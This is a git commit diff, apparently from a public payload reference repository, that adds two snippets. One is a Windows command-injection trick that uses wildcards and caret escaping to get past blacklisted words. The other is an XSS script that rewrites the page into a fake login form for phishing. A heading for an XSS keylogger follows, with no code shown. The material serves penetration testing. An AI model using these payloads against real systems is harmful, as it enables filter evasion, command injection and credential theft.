Windows RCE wildcard + XSS UI redressing

This commit is contained in:
Swissky 2019-01-08 20:49:05 +01:00
parent 2e3aef1a19
commit ea0bddc18a
2 changed files with 15 additions and 0 deletions

View file

@ -110,6 +110,12 @@ cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
```
Bypass blacklisted word with wildcards
```powershell
powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
```
Bypass zsh/bash/sh blacklist
```powershell

View file

@ -33,6 +33,15 @@ fclose($fp);
?>
```
UI redressing (Sophisticated phishing)
```html
<script>
history.replaceState(null, null, '../../../login');
document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"
</script>
```
Keylogger for XSS
```javascript